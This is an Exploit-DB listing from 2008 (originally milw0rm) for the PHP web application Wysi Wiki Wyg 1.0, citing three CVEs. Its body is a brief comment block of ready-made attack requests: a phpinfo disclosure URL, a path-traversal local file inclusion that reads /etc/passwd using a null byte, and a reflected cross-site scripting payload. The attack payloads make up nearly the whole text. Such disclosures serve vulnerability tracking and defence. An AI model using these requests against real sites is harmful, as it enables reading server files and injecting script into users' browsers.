Wysi Wiki Wyg 1.0 - LFI/XSS/PHPInfo Remote Vulnerabilities

2008-10-20T00:00:00
ID EDB-ID:6042
Type exploitdb
Reporter StAkeR
Modified 2008-10-20T00:00:00

Description

Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities. CVE-2008-3205,CVE-2008-5322,CVE-2008-5323. Webapps exploit for php platform

                                        
                                            /*
   
   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure 
  -  index.php?categup=isset
  
  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00
  
  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>



*/

# milw0rm.com [2008-10-20]